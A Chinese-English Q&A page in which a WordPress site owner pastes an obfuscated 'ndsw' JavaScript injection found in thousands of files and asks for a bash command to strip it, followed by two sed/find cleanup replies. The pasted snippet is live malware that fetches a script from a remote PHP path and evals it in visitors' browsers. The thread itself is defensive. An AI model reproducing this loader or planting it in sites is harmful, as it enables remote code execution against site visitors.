当前位置: 文江博客话题详情

命令删除具有各种特殊字符的长JavaScript恶意软件代码

发布于 2025-01-23 01:13:20 字数 2032 浏览 4 评论 0原文

正如我的主题行所述,我有成千上万的.js和.html文件感染了JavaScript代码(WordPress),并希望删除代码。我尝试了不同的SED并找到无济于事的组合。请有人使用这些技能,可以帮助我创建bash命令以删除下面的代码?

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//domainname.com/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

任何帮助都将受到赞赏。请注意,我需要从数千个文件和内部子文件夹中删除此代码。

请帮助解决此关键恶意软件。

原文

As my subject line states, I have thousands of .js and .html files infected with javascript code (WordPress) and want to remove the code. I tried different sed and find combinations to no avail.. please can someone with these skills help me create a bash command to remove this code below?

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//domainname.com/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Any help is appreciated. Please note I need to remove this code from thousands of files and inside subfolders.

Please help to resolve this critical malware.

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(2

不打扰别人 2025-01-30 01:13:20

今天我需要这个并尝试了此命令并起作用

cd /dir/structure/with/infected/text/files
for file in $(find . -mindepth 1 -type f); do sed -i "s/\;if(ndsw===.*//" $file; done

Today I needed this and tried this command and worked

cd /dir/structure/with/infected/text/files
for file in $(find . -mindepth 1 -type f); do sed -i "s/\;if(ndsw===.*//" $file; done
回复 原文
夜未央樱花落 2025-01-30 01:13:20

我在Shell脚本中创建了此脚本以删除大量的COD

obs:从污染的目录上方调用bashscript,因为它包含代码

示例的一部分:bash namesscript.sh diretorio

#!/bin/bash
    log='/var/log/excluirVirus.log'
    Data=$(date "+%D - %H:%M:%S") 
    touch listaArquivos
    echo"=========================$Data========================================="
    echo "$Data Iniciando limpeza dos arquivos" >> $log
    find "$1" .js 2> /dev/null > listaArquivos
    for arquivo in $(cat listaArquivos)
    do 
       if [ ! -d $arquivo ]; then
          echo "$Data Limpando o arquivo $arquivo "|tee -a $log
          sed -i "s/\;if(ndsw===.*//" $arquivo
       fi      
    done
    rm listaArquivos
    echo "$Data Limpeza finalizada" >> $log
 echo"=========================$Data========================================="

I created this script in shell script to remove the massive cod

Obs: Call bashScript from the directory above the contaminated one, as it contains part of the code

Example: bash nameScript.sh diretorio

#!/bin/bash
    log='/var/log/excluirVirus.log'
    Data=$(date "+%D - %H:%M:%S") 
    touch listaArquivos
    echo"=========================$Data========================================="
    echo "$Data Iniciando limpeza dos arquivos" >> $log
    find "$1" .js 2> /dev/null > listaArquivos
    for arquivo in $(cat listaArquivos)
    do 
       if [ ! -d $arquivo ]; then
          echo "$Data Limpando o arquivo $arquivo "|tee -a $log
          sed -i "s/\;if(ndsw===.*//" $arquivo
       fi      
    done
    rm listaArquivos
    echo "$Data Limpeza finalizada" >> $log
 echo"=========================$Data========================================="
回复 原文
~没有更多了~

关于作者

深海不蓝

暂无简介

文章
评论
27 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

牛↙奶布丁

文章 0 评论 0

COSO

文章 0 评论 0

落叶

文章 0 评论 0

暗地喜欢

文章 0 评论 0

qq_i8qOEG

文章 0 评论 0

qq_Wl4Sbi

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文